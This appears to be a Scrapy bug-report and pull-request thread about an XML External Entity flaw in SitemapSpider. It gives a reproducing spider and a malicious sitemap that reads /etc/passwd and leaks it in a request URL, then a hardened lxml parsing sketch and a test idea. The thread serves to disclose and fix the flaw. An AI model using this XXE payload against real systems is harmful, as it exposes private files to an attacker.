The XML reader used by SitemapSpider to process XML sitemaps is vulnerable to an XML External Entity (XXE) attack. The spider and the sitemap file (/tmp/malicious_sitemap.xml) below reproduce the bug.
from scrapy.contrib.spiders import SitemapSpider


class TestSpider(SitemapSpider):
    name = 'test'
    sitemap_urls = ['file:///tmp/malicious_sitemap.xml']

    def parse(self, response):
        pass
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url>
    <loc>http://127.0.0.1:8000/&xxe;</loc>
  </url>
</urlset>
As a result, the contents of /etc/passwd are sent to the server at http://127.0.0.1:8000/ as part of the URL path.
@csalazar are you going to update the PR with fixes for the other Selector?
Do you mind adding a test case specifically for the LxmlDocument class?
defusedxml looks good, but it may require more work to integrate. On the other hand, resolve_entities=False looks quick enough to be merged soon.
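For reference, here is a minimal sketch of the resolve_entities=False approach using lxml directly. It is not the actual Scrapy patch: `parse_sitemap_safely` and `demo` are hypothetical names, and the temporary file with the `TOP-SECRET` marker stands in for /etc/passwd so the check does not depend on the host system.

```python
import os
import pathlib
import tempfile

from lxml import etree


def parse_sitemap_safely(xml_bytes):
    """Parse XML without expanding entity references (hypothetical helper)."""
    # resolve_entities=False keeps &xxe; as an unexpanded reference;
    # no_network=True additionally blocks network lookups during parsing.
    parser = etree.XMLParser(resolve_entities=False, no_network=True)
    return etree.fromstring(xml_bytes, parser=parser)


def demo():
    """Feed an XXE payload to the hardened parser and return the serialized tree."""
    # Stand-in for a sensitive local file such as /etc/passwd.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("TOP-SECRET")
        secret_path = f.name
    try:
        secret_uri = pathlib.Path(secret_path).as_uri()
        payload = (
            '<?xml version="1.0" encoding="utf-8"?>\n'
            '<!DOCTYPE foo [\n'
            '  <!ELEMENT foo ANY >\n'
            '  <!ENTITY xxe SYSTEM "%s" >\n'
            ']>\n'
            '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">\n'
            '  <url><loc>http://127.0.0.1:8000/&xxe;</loc></url>\n'
            '</urlset>\n' % secret_uri
        ).encode("utf-8")
        root = parse_sitemap_safely(payload)
        return etree.tostring(root)
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    serialized = demo()
    # The file contents must not appear anywhere in the parsed document.
    assert b"TOP-SECRET" not in serialized
    print(serialized.decode("utf-8"))
```

A regression test for the fix could follow the same shape: parse a payload like the one above through the patched code path and assert that the referenced file's contents never show up in the extracted URLs.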